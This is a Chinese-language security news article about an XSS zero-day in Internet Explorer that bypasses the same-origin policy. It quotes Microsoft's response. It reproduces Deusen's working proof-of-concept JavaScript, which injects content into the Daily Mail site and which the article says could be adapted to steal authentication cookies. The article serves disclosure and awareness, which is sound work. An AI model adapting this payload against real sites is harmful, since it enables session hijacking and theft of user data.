最新XSS 0day漏洞來襲 影響最新版本IE瀏覽器
安全研究人員近日發(fā)現(xiàn)了一個嚴(yán)重的XSS 0day漏洞,該漏洞可影響最新版本的IE瀏覽器,將用戶暴露在被攻擊和身份盜竊的危險之中。
漏洞信息
該漏洞能夠影響完全修復(fù)過的IE瀏覽器,黑客可以利用該漏洞盜取用戶的敏感數(shù)據(jù)(例如登錄憑證),并能向瀏覽器會話注入惡意內(nèi)容。
攻擊者利用該XSS漏洞可以繞過同源策略(SOP)。同源策略是web應(yīng)用中一個基本的安全模型,用來保護用戶的瀏覽體驗。
同源策略在維基百科上的解釋為:
“該策略允許同一站點(系統(tǒng)、主機名和端口號的組合)頁面上的腳本訪問彼此的DOM,而沒有特定的限制,但阻止訪問不同站點上的DOM。”
漏洞POC
上周Deusen公布了一個POC利用,以此演示當(dāng)用戶使用完全修補的IE瀏覽器訪問特定的網(wǎng)頁時如何繞過SOP。該Demo向《每日郵報》官方網(wǎng)站中注入了“Hacked by Deusen”的內(nèi)容。
以同樣的方式,一旦攻擊者登錄網(wǎng)站,他們就可以冒充受害者從該網(wǎng)站盜取身份驗證cookie。一旦得到cookie,攻擊者就可以訪問某些限制區(qū)域,而正常情況下該區(qū)域只有受害者能訪問,包括信用卡數(shù)據(jù)、瀏覽歷史和其他機密數(shù)據(jù)。此外,釣魚網(wǎng)站也可以利用該漏洞誘騙網(wǎng)民泄露他們在敏感網(wǎng)站的登錄密碼。
下面是繞過IE瀏覽器中同源策略所使用的代碼:
function go()
{
w=window.frames[0];
w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Closethis window after 3seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
}
setTimeout("go()",1000);
微軟回應(yīng)
微軟表示已經(jīng)開始修復(fù)該漏洞。微軟確認(rèn)目前還沒有收到大量漏洞利用的案例。
“我們還沒聽說這個漏洞被大量利用,目前我們正在進行安全更新。另外,要利用該漏洞,攻擊者需要首先誘導(dǎo)用戶進入一個惡意網(wǎng)站,這一步經(jīng)常通過網(wǎng)絡(luò)釣魚來實現(xiàn)。不過,在新版本的IE瀏覽器中默認(rèn)開啟的SmartScreen功能,能夠保護用戶免受釣魚網(wǎng)站危害。
我們將繼續(xù)鼓勵用戶不要打開來源不明的的鏈接,同時也不要訪問不可信的網(wǎng)站。并且,為了保護用戶的信息,我們建議在離開網(wǎng)站時要及時注銷登錄的賬號。”
微軟解釋說,攻擊者必須首先誘導(dǎo)受害者訪問一個惡意網(wǎng)站,這一般可以通過幾種方式簡單地實現(xiàn):例如,可以通過垃圾郵件分享一個鏈接,或者通過社交網(wǎng)絡(luò)來實現(xiàn)。
接下來,讓我們共同等待微軟修復(fù)漏洞吧。
參考來源:http://securityaffairs.co/wordpress/33089/security/severe-xss-flaw-explorer.html